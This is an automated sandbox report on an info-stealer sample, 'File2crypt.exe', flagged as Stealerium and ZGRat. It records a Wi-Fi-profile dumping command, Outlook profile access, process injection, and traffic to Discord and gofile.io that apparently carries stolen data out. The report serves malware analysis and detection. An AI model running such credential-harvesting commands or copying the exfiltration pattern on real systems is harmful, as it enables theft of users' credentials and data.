"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Document.pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2880 wrote to memory of 3948 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Document.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62049B54191AA028E86743705555F846 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4D586AF83A5279C81D184BD7E1A33E34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4D586AF83A5279C81D184BD7E1A33E34 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=03736972FF31BF8D4652A6A526315093 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=03736972FF31BF8D4652A6A526315093 --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=293C24FCA16FF55C946C9D1A4B780C29 --mojo-platform-channel-handle=2424 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=01D52CBAE8FBB77AF724ABDA1DC63950 --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64CD67F886FBE9EAA9AFF20EC0881F8D --mojo-platform-channel-handle=2780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 169.0.37.23.in-addr.arpa udp
US 8.8.8.8:53 14.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 34.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 c223511c13af47b706b807b82beeaaf6
SHA1 c8fc8f5becbd11754cd65dbc08418e2a7dd37fd5
SHA256 2f12ec42fb50a1e42825c92df791725ff5733e5e3748f1d0275f6cf5f1548796
SHA512 603d2ce27610fe36a065525e58532a549f24fd4f2c9fe12804d6dbbfbb773f4b13526a4841619274072eba990f9201fb82c5703fa8e640fd4345efca69e96bd3

Analysis: behavioral8

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

14s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Stealerium

stealer stealerium

ZGRat

rat zgrat

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3856 set thread context of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3856 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe
PID 2148 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe C:\Windows\SysWOW64\cmd.exe
PID 468 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 468 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 468 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 icanhazip.com udp
US 104.18.115.97:80 icanhazip.com tcp
US 8.8.8.8:53 evcs-ocsp.ws.symantec.com udp
US 152.199.19.74:80 evcs-ocsp.ws.symantec.com tcp
US 8.8.8.8:53 97.115.18.104.in-addr.arpa udp
US 104.18.115.97:80 icanhazip.com tcp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 104.18.115.97:80 icanhazip.com tcp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 54.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/3856-1-0x0000000000240000-0x0000000000458000-memory.dmp

memory/3856-0-0x0000000074790000-0x0000000074F40000-memory.dmp

memory/3856-2-0x0000000004D90000-0x0000000004DA0000-memory.dmp

memory/3856-3-0x0000000004EE0000-0x00000000050E8000-memory.dmp

memory/3856-4-0x0000000005160000-0x000000000536A000-memory.dmp

memory/3856-5-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-10-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-14-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-18-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-24-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-28-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-34-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-36-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-40-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-44-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-48-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-50-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-54-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-58-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-62-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-66-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-68-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-64-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-60-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-56-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-52-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-46-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-42-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-38-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-32-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-30-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-26-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-22-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-20-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-16-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-12-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-8-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-6-0x0000000005160000-0x0000000005364000-memory.dmp

memory/3856-937-0x0000000005370000-0x0000000005371000-memory.dmp

memory/3856-939-0x0000000005400000-0x000000000544C000-memory.dmp

memory/3856-938-0x0000000005620000-0x00000000057C2000-memory.dmp

memory/3856-940-0x0000000006DF0000-0x0000000007394000-memory.dmp

memory/2148-944-0x0000000000400000-0x0000000000592000-memory.dmp

memory/2148-947-0x0000000005180000-0x00000000051E6000-memory.dmp

memory/2148-946-0x0000000074790000-0x0000000074F40000-memory.dmp

memory/3856-945-0x0000000074790000-0x0000000074F40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File2crypt.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/2148-948-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-953-0x0000000005160000-0x0000000005168000-memory.dmp

memory/2148-952-0x00000000056F0000-0x0000000005716000-memory.dmp

memory/2148-951-0x0000000005660000-0x00000000056F2000-memory.dmp

memory/2148-955-0x00000000067A0000-0x00000000067A8000-memory.dmp

memory/2148-956-0x00000000067C0000-0x00000000067DE000-memory.dmp

memory/2148-954-0x0000000006790000-0x000000000679A000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Browsers\Firefox\Bookmarks.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2148-1013-0x0000000006B20000-0x0000000006BB2000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Process.txt

MD5 cd3f1b337705d2b32c17dc4adc97a2b4
SHA1 45e048692510d63446ee2a5ecabe106b89306bd4
SHA256 d8d763b2649f655efa9b5cf7eb82b56be32bfafbc098577736de35e875d87a48
SHA512 2bd512434dd7066dab77565136dcbe73d869191ef4f09bc458529af3d0b4c88c5898fcdbd644dad80259e12cbefffe36d26a3fe2c252b47117c1a29a7cc9200f

memory/2148-1112-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1114-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2148-1148-0x00000000068B0000-0x000000000692A000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Apps.txt

MD5 8e3475a0678a63edc092dda39fc9bb2d
SHA1 589ce3f8ba1797024f6c0ab06b248c67cf739cac
SHA256 d2ab564b653221a1ee2f60b56437698ea39533e8aaff5773eb4506c3be227099
SHA512 fe263f2624d887400570d3ccaf1c6e79b239f62a1ca20e3bca6c928056be7c84b405ad80dc4bd91b073272a76852ddc8032d586142e272db2beafafd1a0ad96f

memory/2148-1221-0x00000000069D0000-0x0000000006A82000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Debug.txt

MD5 6038c6816d6cd11f7c460c00b2238fc6
SHA1 d4e182455aa02a3363a6ebb5cb0ea987b2507b69
SHA256 856b43e957bd20204f0f34b645706175d6eeb18120e135eccae5d39d99780ca0
SHA512 b00b0ce6fb86f2298c18c6ce748f71882aefe6d995b61e82494edb4647849596537b7e40c8dd7e64d5eae24d2496063d6aa9a24d9ce5a354ca94a85bb6ee4278

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/2148-1223-0x0000000006D20000-0x0000000006D42000-memory.dmp

memory/2148-1224-0x0000000007E20000-0x0000000008174000-memory.dmp

C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\msgid.dat

MD5 2c293d26d4955cc89b70566a8fd0b371
SHA1 20849f72e81215208fc91c52ba2caf57993466bb
SHA256 499481147f342836968aa4af73d5280686a48c91eb9837eda1a1cfcf07f59121
SHA512 2b82cfed0ce3d49376eacdede47010965d529cc45d8c26d9d0bc96df56005f65eef608c177d21fd073284cb3985fbf238bd7ef66638b968977e6a7d01148810a

